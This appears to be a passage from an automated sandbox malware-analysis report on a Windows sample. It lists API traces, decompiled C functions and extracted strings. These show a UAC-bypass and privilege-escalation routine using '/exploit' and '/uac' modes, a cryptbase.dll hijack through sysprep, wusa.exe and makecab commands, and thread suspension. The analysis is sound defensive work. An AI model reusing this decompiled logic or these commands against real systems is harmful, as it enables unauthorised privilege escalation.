      • Part of subcall function 00D3250C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D32526
      • Part of subcall function 00D3250C: GetFileSize.KERNEL32(00000000,00000000,7622DAA3,?,?,00D31DD6,?,?,?,?,?), ref: 00D32536
      • Part of subcall function 00D3250C: LocalAlloc.KERNEL32(00000040,00000000,?,?,00D31DD6,?,?,?,?,?), ref: 00D32544
      • Part of subcall function 00D3250C: ReadFile.KERNEL32(00000000,00000000,00D31DD6,?,00000000), ref: 00D3255F
      • Part of subcall function 00D3250C: GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D32572
      • Part of subcall function 00D3250C: GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D3257A
      • Part of subcall function 00D3250C: CloseHandle.KERNEL32(00000000), ref: 00D32583
      • Part of subcall function 00D3250C: GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D3258C
    • DeleteFileA.KERNEL32(?), ref: 00D32E6F
      • Part of subcall function 00D32F02: GetModuleHandleA.KERNEL32(kernel32.dll,LoadLibraryA,?,00000000,00000110,?,.rsrc,00000005,76248354,0000C002,00000104,76248354,?,?), ref: 00D32F9E
      • Part of subcall function 00D32F02: GetProcAddress.KERNEL32(00000000), ref: 00D32FA5
      • Part of subcall function 00D32F02: GetModuleHandleA.KERNEL32(kernel32.dll,WinExec), ref: 00D32FB7
      • Part of subcall function 00D32F02: GetProcAddress.KERNEL32(00000000), ref: 00D32FBE
      • Part of subcall function 00D32F02: CheckSumMappedFile.IMAGEHLP(?,?,?,00000000,?,00000111,00D32E88,?,?,?,?), ref: 00D33043
      • Part of subcall function 00D32F02: GetLastError.KERNEL32 ref: 00D33055
    • GetTempPathA.KERNEL32(00000104,?), ref: 00D32D5E
    • DeleteFileA.KERNEL32(?), ref: 00D32D7A
      • Part of subcall function 00D32AF9: LocalAlloc.KERNEL32(00000040,-00000100,00000104,7622458A), ref: 00D32B25
      • Part of subcall function 00D32AF9: _memset.LIBCMT ref: 00D32B4D
      • Part of subcall function 00D32AF9: _memset.LIBCMT ref: 00D32B5B
      • Part of subcall function 00D32AF9: GetStartupInfoA.KERNEL32(?), ref: 00D32B6A
      • Part of subcall function 00D32AF9: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00D32D96), ref: 00D32B8C
      • Part of subcall function 00D32AF9: WaitForSingleObject.KERNEL32(00D32D96,000000FF), ref: 00D32B9B
      • Part of subcall function 00D32AF9: GetExitCodeProcess.KERNEL32(00D32D96,?), ref: 00D32BAC
      • Part of subcall function 00D32AF9: CloseHandle.KERNEL32(00000000), ref: 00D32BBB
      • Part of subcall function 00D32AF9: CloseHandle.KERNEL32(00D32D96), ref: 00D32BC0
      • Part of subcall function 00D32AF9: GetLastError.KERNEL32(?,?,00000000,?,00000000,76248354), ref: 00D32BC7
      • Part of subcall function 00D32AF9: LocalFree.KERNEL32(00000000,?,?,00000000,?,00000000,76248354), ref: 00D32BCE
      • Part of subcall function 00D3259B: FindFirstFileA.KERNEL32(00D32DA5,?,00000104), ref: 00D325B1
      • Part of subcall function 00D3259B: FindClose.KERNEL32(00000000), ref: 00D325BE
    • GetWindowsDirectoryA.KERNEL32(?,00000103,?), ref: 00D32DBE
    • GetWindowsDirectoryA.KERNEL32(?,00000103), ref: 00D32DDB
    • DeleteFileA.KERNEL32(?,?,?,?), ref: 00D32E4B
    • DeleteFileA.KERNEL32(?,?), ref: 00D32E54
    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?), ref: 00D32E59
    • DeleteFileA.KERNEL32(?,?,?,?), ref: 00D32E66
    • GetLastError.KERNEL32 ref: 00D32E77
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: File$ErrorLast$Handle$CloseDelete$Local$AddressCreateDirectoryModulePathProcProcessTemp$AllocFindFreeWindows_memset$BuffersCheckCodeCountCurrentExitFirstFlushInfoMappedObjectReadSingleSizeStartupSystemTickVersionWaitWrite_strlenwsprintf
    • String ID: DNWP$IsWow64Process$\%.8x.tmp$\cryptbase.dll$\cryptbase.msu$\system32\sysprep\cryptbase.dll$\system32\sysprep\sysprep.exe$cmd.exe /C %s$cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\system32\sysprep$kernel32.dll$makecab.exe /V1 %s %s
    • API String ID: 1577429191-2259624556
    • Opcode ID: cc3325bdc3052dd07d7dc03fd768ca8466bb6bf2c8beda8b073aff80fe4660e0
    • Instruction ID: 1bbac14094e4af6f8260a20552a817b929a2a422514c7d87968a4f1ca02a522a
    • Opcode Fuzzy Hash: cc3325bdc3052dd07d7dc03fd768ca8466bb6bf2c8beda8b073aff80fe4660e0
    • Instruction Fuzzy Hash: 73711DB6D0021DAADF20EBA4DC89AEE77ACEB04340F140466F909E2150E734DA88CF74
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 82%
    			E00D31E99(void* _a8) {
    				char _v264;
    				void* _t22;
    				void* _t25;
    				void* _t27;
    				void* _t33;
    				void* _t40;
    
    				_t55 = _a8 != 1;
    				if(_a8 != 1) {
    					L9:
    					return 1;
    				}
    				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
    				GetCurrentProcessId();
    				E00D321BB( &_v264);
    				_t22 = E00D33590(E00D325CB(_t55,  &_v264), "utilman.exe");
    				_t56 = _t22;
    				if(_t22 == 0) {
    					L10:
    					_t40 = OpenEventA(2, 0, "Global\\AtomFun");
    					__eflags = _t40;
    					if(_t40 == 0) {
    						GetLastError();
    					} else {
    						SetEvent(_t40);
    						CloseHandle(_t40);
    					}
    					_t25 = E00D327DD();
    					__eflags = _t25;
    					if(_t25 != 0) {
    						_t27 = E00D32822(GetCurrentProcessId());
    						__eflags = _t27;
    						if(_t27 > 0) {
    							E00D31C33(_t27, 0);
    						}
    					}
    					L16:
    					_push(0);
    					L7:
    					ExitProcess();
    				}
    				_t33 = E00D33590(E00D325CB(_t56,  &_v264), "logonui.exe");
    				_t57 = _t33;
    				if(_t33 == 0) {
    					goto L10;
    				}
    				if(E00D33590(E00D325CB(_t57,  &_v264), "sysprep.exe") != 0) {
    					goto L9;
    				}
    				_push( &_a8);
    				_a8 = 0;
    				_push(GetCurrentProcess());
    				if(E00D3289C() == 0 || _a8 < 0x3000) {
    					goto L16;
    				} else {
    					_push(0x50574e44);
    					goto L7;
    				}
    			}









    0x00d31ea5
    0x00d31ea6
    0x00d31f62
    0x00d31f66
    0x00d31f66
    0x00d31ec4
    0x00d31ed0
    0x00d31ed9
    0x00d31ef0
    0x00d31ef7
    0x00d31ef9
    0x00d31f69
    0x00d31f77
    0x00d31f79
    0x00d31f7b
    0x00d31f8d
    0x00d31f7d
    0x00d31f7e
    0x00d31f85
    0x00d31f85
    0x00d31f93
    0x00d31f98
    0x00d31f9a
    0x00d31f9f
    0x00d31fa4
    0x00d31fa6
    0x00d31faa
    0x00d31faa
    0x00d31fa6
    0x00d31faf
    0x00d31faf
    0x00d31f5a
    0x00d31f5a
    0x00d31f5a
    0x00d31f0d
    0x00d31f14
    0x00d31f16
    0x00000000
    0x00000000
    0x00d31f33
    0x00000000
    0x00d31f61
    0x00d31f38
    0x00d31f39
    0x00d31f42
    0x00d31f4a
    0x00000000
    0x00d31f55
    0x00d31f55
    0x00000000
    0x00d31f55

    APIs
    • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?), ref: 00D31EBD
    • GetModuleFileNameA.KERNEL32(00000000,?,?), ref: 00D31EC4
    • GetCurrentProcessId.KERNEL32(?,?), ref: 00D31ED0
      • Part of subcall function 00D325CB: _strlen.LIBCMT ref: 00D325D7
      • Part of subcall function 00D325CB: _strlen.LIBCMT ref: 00D325F2
    • GetCurrentProcess.KERNEL32(?,sysprep.exe,logonui.exe,utilman.exe,?,?,?), ref: 00D31F3C
      • Part of subcall function 00D3289C: _memset.LIBCMT ref: 00D328CA
      • Part of subcall function 00D3289C: GetVersionExA.KERNEL32(?,00000000,7622DF30,00000000), ref: 00D328DF
      • Part of subcall function 00D3289C: GetVersionExA.KERNEL32(?), ref: 00D328F0
      • Part of subcall function 00D3289C: OpenProcessToken.ADVAPI32(?,00000018,?), ref: 00D3290D
      • Part of subcall function 00D3289C: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00D3292F
      • Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D3293B
      • Part of subcall function 00D3289C: LocalAlloc.KERNEL32(00000040,?), ref: 00D32947
      • Part of subcall function 00D3289C: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00D32960
      • Part of subcall function 00D3289C: GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00D32968
      • Part of subcall function 00D3289C: GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00D32978
      • Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D3298B
      • Part of subcall function 00D3289C: LocalFree.KERNEL32(00000000), ref: 00D32992
      • Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D3299A
      • Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D3299E
      • Part of subcall function 00D3289C: CloseHandle.KERNEL32(?), ref: 00D329A7
      • Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D329AF
    • ExitProcess.KERNEL32 ref: 00D31F5A
    • OpenEventA.KERNEL32(00000002,00000000,Global\AtomFun,utilman.exe,?,?,?), ref: 00D31F71
    • SetEvent.KERNEL32(00000000,?,?), ref: 00D31F7E
    • CloseHandle.KERNEL32(00000000), ref: 00D31F85
    • GetLastError.KERNEL32(?,?), ref: 00D31F8D
      • Part of subcall function 00D327DD: GetVersionExA.KERNEL32(?), ref: 00D327F7
      • Part of subcall function 00D327DD: GetLastError.KERNEL32 ref: 00D32818
    • GetCurrentProcessId.KERNEL32(?,?), ref: 00D31F9C
      • Part of subcall function 00D32822: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D32832
      • Part of subcall function 00D32822: Process32First.KERNEL32(00000000,?), ref: 00D32850
      • Part of subcall function 00D32822: Process32Next.KERNEL32(00000000,00000128), ref: 00D3286C
      • Part of subcall function 00D32822: GetLastError.KERNEL32(00000000,7622D965), ref: 00D3287F
      • Part of subcall function 00D32822: CloseHandle.KERNEL32(00000000), ref: 00D32886
      • Part of subcall function 00D32822: GetLastError.KERNEL32(00000000,7622D965), ref: 00D3288E
      • Part of subcall function 00D31C33: CreateToolhelp32Snapshot.KERNEL32(00000004,?), ref: 00D31C43
      • Part of subcall function 00D31C33: Thread32First.KERNEL32(00000000,?), ref: 00D31C66
      • Part of subcall function 00D31C33: OpenThread.KERNEL32(00000002,00000000,00D31FAF,7622D965,00000000,00000004,?,00000000), ref: 00D31C91
      • Part of subcall function 00D31C33: SuspendThread.KERNEL32(00000000), ref: 00D31C9E
      • Part of subcall function 00D31C33: CloseHandle.KERNEL32(00000000), ref: 00D31CAD
      • Part of subcall function 00D31C33: Thread32Next.KERNEL32(00000000,0000001C), ref: 00D31CB4
      • Part of subcall function 00D31C33: GetLastError.KERNEL32(00000000,00000004,?,00000000), ref: 00D31CC0
      • Part of subcall function 00D31C33: CloseHandle.KERNEL32(00000000), ref: 00D31CC7
      • Part of subcall function 00D31C33: GetLastError.KERNEL32(00000004,?,00000000,?,?,00D31FAF,00000000,00000000,00000000), ref: 00D31CCC
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: ErrorLast$Handle$CloseProcess$CurrentOpenTokenVersion$AuthorityCreateEventFirstInformationLocalModuleNextProcess32SnapshotThreadThread32Toolhelp32_strlen$AllocCountExitFileFreeNameSuspend_memset
    • String ID: Global\AtomFun$logonui.exe$sysprep.exe$utilman.exe
    • API String ID: 1416955679-3994176926
    • Opcode ID: 553a0aa76fa38d5b5615204555bd2b8f69f3f00d950f9c1c30b4c97ff6bc81d2
    • Instruction ID: 29d9fb16c42810c320b75ef84f06ce2843e21e73036db6e8fd4f780be17dc697
    • Opcode Fuzzy Hash: 553a0aa76fa38d5b5615204555bd2b8f69f3f00d950f9c1c30b4c97ff6bc81d2
    • Instruction Fuzzy Hash: 6421607F904347ABCB14BBB19D4EEAE376CEF45350F044815B605D2141EB78D6848A70
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 275 d31cda-d31d15 call d329c6 call d33510 GetVersionExA 280 d31d17-d31d26 GetVersionExA 275->280 281 d31d2c-d31d33 275->281 280->281 282 d31e8f-d31e98 280->282 283 d31d35-d31d40 GetCurrentProcess call d3289c 281->283 284 d31d4d-d31d78 GetCommandLineA GetModuleHandleA 281->284 287 d31d45-d31d47 283->287 286 d31d79 call d32308 284->286 288 d31d7e-d31d80 286->288 287->282 287->284 289 d31d86-d31d89 288->289 290 d31e8a call d32481 288->290 292 d31d8f-d31d92 289->292 293 d31e7c call d322dc 289->293 290->282 292->293 295 d31d98-d31da0 IsUserAnAdmin 292->295 296 d31e81-d31e83 293->296 295->293 297 d31da6-d31dd8 GetModuleHandleA GetModuleFileNameA call d3250c 295->297 296->290 299 d31e85 call d31434 296->299 297->293 302 d31dde-d31df3 297->302 299->290 303 d31df5-d31df7 302->303 304 d31e3b-d31e63 call d33e87 call d33143 302->304 305 d31df9-d31dfc 303->305 306 d31dfe-d31e05 303->306 309 d31e68-d31e76 Sleep LocalFree 304->309 305->304 305->306 308 d31e07-d31e0a 306->308 306->309 308->309 311 d31e0c-d31e39 call d33e87 call d32bdc 308->311 309->293 311->309
    C-Code - Quality: 70%
    			E00D31CDA(void* __ecx) {
    				void* __ebx;
    				void* _t56;
    				void* _t58;
    				void* _t80;
    				void* _t84;
    				void* _t86;
    				void* _t97;
    				void* _t99;
    
    				_t86 = __ecx;
    				_t97 = _t99 - 0x78;
    				_t84 = E00D329C6();
    				E00D33510(_t97 - 0x40, 0, 0x9c);
    				 *(_t97 - 0x40) = 0x9c;
    				if(GetVersionExA(_t97 - 0x40) != 0) {
    					L2:
    					 *((intOrPtr*)(_t97 + 0x60)) = 0;
    					if( *((intOrPtr*)(_t97 - 0x3c)) < 6) {
    						L4:
    						GetCommandLineA();
    						_push(_t97 + 0x64);
    						_push(_t97 + 0x68);
    						_push(_t97 + 0x6c);
    						_push(_t97 + 0x5c);
    						 *((intOrPtr*)(_t97 + 0x5c)) = 0;
    						 *((intOrPtr*)(_t97 + 0x6c)) = 0;
    						 *((intOrPtr*)(_t97 + 0x68)) = 0;
    						 *((intOrPtr*)(_t97 + 0x64)) = 0;
    						_push(GetModuleHandleA(0));
    						_t56 = E00D32308(_t108);
    						if(_t56 == 0) {
    							L19:
    							E00D32481();
    							L20:
    							return 0;
    						}
    						if( *((intOrPtr*)(_t97 + 0x5c)) != 0 ||  *((intOrPtr*)(_t97 + 0x64)) != 0) {
    							L17:
    							_t58 = E00D322DC(_t118);
    							_t119 = _t58;
    							if(_t58 == 0) {
    								E00D31434(_t119);
    							}
    							goto L19;
    						} else {
    							__imp__#680();
    							if(_t56 != 0) {
    								goto L17;
    							}
    							GetModuleFileNameA(GetModuleHandleA(0), _t97 - 0x144, 0x103);
    							 *(_t97 + 0x74) = 0;
    							 *((intOrPtr*)(_t97 + 0x70)) = 0;
    							if(E00D3250C(_t86, _t97 - 0x144, _t97 + 0x74, _t97 + 0x70) != 0) {
    								 *( *((intOrPtr*)( *(_t97 + 0x74) + 0x3c)) +  *(_t97 + 0x74) + 0x16) =  *( *((intOrPtr*)( *(_t97 + 0x74) + 0x3c)) +  *(_t97 + 0x74) + 0x16) | 0x00002000;
    								if( *((intOrPtr*)(_t97 - 0x3c)) < 6 || _t84 == 0 &&  *((intOrPtr*)(_t97 + 0x6c)) == 0) {
    									_push(_t97 - 0x144);
    									_push("\"%s\" /exploit");
    									_push(_t97 - 0x248);
    									E00D33E87();
    									E00D33143(__eflags,  *(_t97 + 0x74),  *((intOrPtr*)(_t97 + 0x70)), _t97 - 0x248);
    								} else {
    									if( *((intOrPtr*)(_t97 + 0x60)) < 0x3000) {
    										_t118 =  *((intOrPtr*)(_t97 + 0x68));
    										if( *((intOrPtr*)(_t97 + 0x68)) == 0) {
    											_push(_t97 - 0x144);
    											_push("\"%s\" /uac");
    											_push(_t97 - 0x248);
    											E00D33E87();
    											E00D32BDC(_t84,  *(_t97 + 0x74),  *((intOrPtr*)(_t97 + 0x70)), _t97 - 0x248);
    										}
    									}
    								}
    								Sleep(0xbb8);
    								LocalFree( *(_t97 + 0x74));
    							}
    							goto L17;
    						}
    					}
    					_push(_t97 + 0x60);
    					_push(GetCurrentProcess());
    					_t80 = E00D3289C();
    					_t108 = _t80;
    					if(_t80 == 0) {
    						goto L20;
    					}
    					goto L4;
    				}
    				 *(_t97 - 0x40) = 0x94;
    				if(GetVersionExA(_t97 - 0x40) == 0) {
    					goto L20;
    				}
    				goto L2;
    			}











    0x00d31cda
    0x00d31cdb
    0x00d31cf3
    0x00d31cfc
    0x00d31d07
    0x00d31d15
    0x00d31d2c
    0x00d31d30
    0x00d31d33
    0x00d31d4d
    0x00d31d4d
    0x00d31d5c
    0x00d31d60
    0x00d31d64
    0x00d31d68
    0x00d31d6a
    0x00d31d6d
    0x00d31d70
    0x00d31d73
    0x00d31d78
    0x00d31d79
    0x00d31d80
    0x00d31e8a
    0x00d31e8a
    0x00d31e8f
    0x00d31e98
    0x00d31e98
    0x00d31d89
    0x00d31e7c
    0x00d31e7c
    0x00d31e81
    0x00d31e83
    0x00d31e85
    0x00d31e85
    0x00000000
    0x00d31d98
    0x00d31d98
    0x00d31da0
    0x00000000
    0x00000000
    0x00d31db6
    0x00d31dcb
    0x00d31dce
    0x00d31dd8
    0x00d31deb
    0x00d31df3
    0x00d31e41
    0x00d31e48
    0x00d31e4d
    0x00d31e4e
    0x00d31e63
    0x00d31dfe
    0x00d31e05
    0x00d31e07
    0x00d31e0a
    0x00d31e12
    0x00d31e19
    0x00d31e1e
    0x00d31e1f
    0x00d31e34
    0x00d31e34
    0x00d31e0a
    0x00d31e05
    0x00d31e6d
    0x00d31e76
    0x00d31e76
    0x00000000
    0x00d31dd8
    0x00d31d89
    0x00d31d38
    0x00d31d3f
    0x00d31d40
    0x00d31d45
    0x00d31d47
    0x00000000
    0x00000000
    0x00000000
    0x00d31d47
    0x00d31d1b
    0x00d31d26
    0x00000000
    0x00000000
    0x00000000

    APIs
      • Part of subcall function 00D329C6: _memset.LIBCMT ref: 00D329E1
      • Part of subcall function 00D329C6: GetVersionExA.KERNEL32(?,?,?), ref: 00D329F0
      • Part of subcall function 00D329C6: GetLastError.KERNEL32(?,?), ref: 00D329FA
      • Part of subcall function 00D329C6: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00D32A24
      • Part of subcall function 00D329C6: OpenProcessToken.ADVAPI32(00000000,?,?), ref: 00D32A2B
      • Part of subcall function 00D329C6: GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?,?,?), ref: 00D32A51
      • Part of subcall function 00D329C6: GetLastError.KERNEL32(?,?), ref: 00D32A57
      • Part of subcall function 00D329C6: CloseHandle.KERNEL32(?), ref: 00D32A60
      • Part of subcall function 00D329C6: GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,?), ref: 00D32A86
      • Part of subcall function 00D329C6: CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?,?,?), ref: 00D32A9E
      • Part of subcall function 00D329C6: CheckTokenMembership.ADVAPI32(?,?,?,?,?), ref: 00D32AB6
      • Part of subcall function 00D329C6: GetLastError.KERNEL32(?,?), ref: 00D32AC5
      • Part of subcall function 00D329C6: CloseHandle.KERNEL32(?), ref: 00D32ACE
      • Part of subcall function 00D329C6: IsUserAnAdmin.SHELL32 ref: 00D32AD2
      • Part of subcall function 00D329C6: CloseHandle.KERNEL32(?), ref: 00D32ADD
      • Part of subcall function 00D329C6: GetLastError.KERNEL32(?,?), ref: 00D32AE1
      • Part of subcall function 00D329C6: IsUserAnAdmin.SHELL32 ref: 00D32AEB
    • _memset.LIBCMT ref: 00D31CFC
    • GetVersionExA.KERNEL32(?,?,?), ref: 00D31D11
    • GetVersionExA.KERNEL32(?,?,?), ref: 00D31D22
    • GetCurrentProcess.KERNEL32(?,?,?), ref: 00D31D39
      • Part of subcall function 00D3289C: _memset.LIBCMT ref: 00D328CA
      • Part of subcall function 00D3289C: GetVersionExA.KERNEL32(?,00000000,7622DF30,00000000), ref: 00D328DF
      • Part of subcall function 00D3289C: GetVersionExA.KERNEL32(?), ref: 00D328F0
      • Part of subcall function 00D3289C: OpenProcessToken.ADVAPI32(?,00000018,?), ref: 00D3290D
      • Part of subcall function 00D3289C: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00D3292F
      • Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D3293B
      • Part of subcall function 00D3289C: LocalAlloc.KERNEL32(00000040,?), ref: 00D32947
      • Part of subcall function 00D3289C: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00D32960
      • Part of subcall function 00D3289C: GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00D32968
      • Part of subcall function 00D3289C: GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00D32978
      • Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D3298B
      • Part of subcall function 00D3289C: LocalFree.KERNEL32(00000000), ref: 00D32992
      • Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D3299A
      • Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D3299E
      • Part of subcall function 00D3289C: CloseHandle.KERNEL32(?), ref: 00D329A7
      • Part of subcall function 00D3289C: GetLastError.KERNEL32 ref: 00D329AF
    • GetCommandLineA.KERNEL32(?,?), ref: 00D31D4D
    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D31D76
      • Part of subcall function 00D32308: GetTickCount.KERNEL32 ref: 00D32313
      • Part of subcall function 00D32308: _memset.LIBCMT ref: 00D32344
      • Part of subcall function 00D32308: GetVersionExA.KERNEL32(?,?,7622DAA3,00000000), ref: 00D32359
      • Part of subcall function 00D32308: GetVersionExA.KERNEL32(?,?,7622DAA3,00000000), ref: 00D3236A
      • Part of subcall function 00D32308: GetCommandLineW.KERNEL32(?,00000000,?,7622DAA3,00000000), ref: 00D32392
      • Part of subcall function 00D32308: CommandLineToArgvW.SHELL32(00000000), ref: 00D32399
      • Part of subcall function 00D32308: LocalFree.KERNEL32(00000000,00000000,?,7622DAA3,00000000), ref: 00D32432
    • IsUserAnAdmin.SHELL32 ref: 00D31D98
    • GetModuleHandleA.KERNEL32(00000000,?,00000103,?,?), ref: 00D31DB3
    • GetModuleFileNameA.KERNEL32(00000000,?,?), ref: 00D31DB6
      • Part of subcall function 00D3250C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D32526
      • Part of subcall function 00D3250C: GetFileSize.KERNEL32(00000000,00000000,7622DAA3,?,?,00D31DD6,?,?,?,?,?), ref: 00D32536
      • Part of subcall function 00D3250C: LocalAlloc.KERNEL32(00000040,00000000,?,?,00D31DD6,?,?,?,?,?), ref: 00D32544
      • Part of subcall function 00D3250C: ReadFile.KERNEL32(00000000,00000000,00D31DD6,?,00000000), ref: 00D3255F
      • Part of subcall function 00D3250C: GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D32572
      • Part of subcall function 00D3250C: GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D3257A
      • Part of subcall function 00D3250C: CloseHandle.KERNEL32(00000000), ref: 00D32583
      • Part of subcall function 00D3250C: GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D3258C
      • Part of subcall function 00D32BDC: GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,00000000,7622DAA3), ref: 00D32BFB
      • Part of subcall function 00D32BDC: GetProcAddress.KERNEL32(00000000), ref: 00D32C02
      • Part of subcall function 00D32BDC: GetCurrentProcess.KERNEL32(?), ref: 00D32C12
      • Part of subcall function 00D32BDC: GetVersionExA.KERNEL32(?), ref: 00D32C30
      • Part of subcall function 00D32BDC: GetTempPathA.KERNEL32(00000104,?), ref: 00D32C73
      • Part of subcall function 00D32BDC: GetTickCount.KERNEL32 ref: 00D32C75
      • Part of subcall function 00D32BDC: _strlen.LIBCMT ref: 00D32C88
      • Part of subcall function 00D32BDC: wsprintfA.USER32 ref: 00D32C96
      • Part of subcall function 00D32BDC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00D32CC2
      • Part of subcall function 00D32BDC: GetTempPathA.KERNEL32(00000104,?), ref: 00D32CE4
      • Part of subcall function 00D32BDC: GetTempPathA.KERNEL32(00000104,?), ref: 00D32D5E
      • Part of subcall function 00D32BDC: DeleteFileA.KERNEL32(?), ref: 00D32D7A
      • Part of subcall function 00D32BDC: GetWindowsDirectoryA.KERNEL32(?,00000103,?), ref: 00D32DBE
      • Part of subcall function 00D32BDC: GetWindowsDirectoryA.KERNEL32(?,00000103), ref: 00D32DDB
      • Part of subcall function 00D32BDC: DeleteFileA.KERNEL32(?,?,?,?), ref: 00D32E4B
      • Part of subcall function 00D32BDC: DeleteFileA.KERNEL32(?,?), ref: 00D32E54
      • Part of subcall function 00D32BDC: LocalFree.KERNEL32(?,?,?,?,?,?,?,?), ref: 00D32E59
      • Part of subcall function 00D32BDC: DeleteFileA.KERNEL32(?,?,?,?), ref: 00D32E66
      • Part of subcall function 00D32BDC: DeleteFileA.KERNEL32(?), ref: 00D32E6F
      • Part of subcall function 00D32BDC: GetLastError.KERNEL32 ref: 00D32E77
      • Part of subcall function 00D33143: GetModuleHandleA.KERNEL32(00000000,00000000,7622DAA3,00000000), ref: 00D3315B
      • Part of subcall function 00D33143: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00D33173
      • Part of subcall function 00D33143: GetTempPathA.KERNEL32(00000104,?), ref: 00D331A5
      • Part of subcall function 00D33143: GetTempPathA.KERNEL32(00000104,?), ref: 00D331CD
      • Part of subcall function 00D33143: GetTickCount.KERNEL32 ref: 00D331CF
      • Part of subcall function 00D33143: _strlen.LIBCMT ref: 00D331E2
      • Part of subcall function 00D33143: wsprintfA.USER32 ref: 00D331F0
      • Part of subcall function 00D33143: GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 00D33207
      • Part of subcall function 00D33143: GetProcAddress.KERNEL32(00000000), ref: 00D3320A
      • Part of subcall function 00D33143: GetCurrentProcess.KERNEL32(00000000), ref: 00D3321A
      • Part of subcall function 00D33143: GetClipboardFormatNameA.USER32(0000C001,?,00000104), ref: 00D33251
      • Part of subcall function 00D33143: GetTempPathA.KERNEL32(00000104,?), ref: 00D3330F
      • Part of subcall function 00D33143: GetTickCount.KERNEL32 ref: 00D33311
      • Part of subcall function 00D33143: _strlen.LIBCMT ref: 00D33324
      • Part of subcall function 00D33143: wsprintfA.USER32 ref: 00D33332
      • Part of subcall function 00D33143: MoveFileA.KERNEL32(?,?), ref: 00D33349
      • Part of subcall function 00D33143: LocalFree.KERNEL32(?,?,?,?,?,?,?,00D31E68,?,?,?,?), ref: 00D33384
      • Part of subcall function 00D33143: GetClipboardFormatNameA.USER32(0000C001,?,00000104), ref: 00D333D2
      • Part of subcall function 00D33143: RegisterWindowMessageA.USER32(?,?), ref: 00D3341D
      • Part of subcall function 00D33143: LockWorkStation.USER32 ref: 00D3343D
      • Part of subcall function 00D33143: CreateEventA.KERNEL32(00000000,00000000,00000000,Global\AtomFun,00000055), ref: 00D33456
      • Part of subcall function 00D33143: GetLastError.KERNEL32 ref: 00D33463
      • Part of subcall function 00D33143: WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00D33471
      • Part of subcall function 00D33143: CloseHandle.KERNEL32(00000000), ref: 00D33485
      • Part of subcall function 00D33143: GetTempPathA.KERNEL32(00000104,?), ref: 00D33493
      • Part of subcall function 00D33143: GetTickCount.KERNEL32 ref: 00D33495
      • Part of subcall function 00D33143: _strlen.LIBCMT ref: 00D334A8
      • Part of subcall function 00D33143: wsprintfA.USER32 ref: 00D334B6
      • Part of subcall function 00D33143: MoveFileA.KERNEL32(?,?), ref: 00D334CD
      • Part of subcall function 00D33143: CopyFileA.KERNEL32(?,?,00000000), ref: 00D334DF
    • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?), ref: 00D31E6D
    • LocalFree.KERNEL32(?,?,?), ref: 00D31E76
      • Part of subcall function 00D322DC: GetLastError.KERNEL32(00000000,7622DAA3,00D3232C,00000000), ref: 00D322EB
      • Part of subcall function 00D322DC: CloseHandle.KERNEL32(00000000), ref: 00D322FD
      • Part of subcall function 00D31434: IsUserAnAdmin.SHELL32 ref: 00D31435
